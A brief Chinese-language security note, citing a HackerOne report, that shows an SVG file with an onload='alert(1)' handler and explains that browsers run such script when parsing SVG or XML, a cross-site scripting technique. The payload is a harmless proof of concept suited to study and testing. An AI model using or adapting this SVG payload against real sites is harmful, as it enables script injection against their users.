来源:https://hackerone.com/reports/998422
    image.png
    内容其实就是

    1. <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    2. <svg
    3. onload="alert(1)"
    4. xmlns="http://www.w3.org/2000/svg">
    5. <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    6. </svg>

    参考:https://www.w3school.com.cn/svg/svg_inhtml.asp
    浏览器解析svg直接就会加载svg标签中的弹窗代码
    image.png
    xml可以弹,svg可以弹,好像还挺多的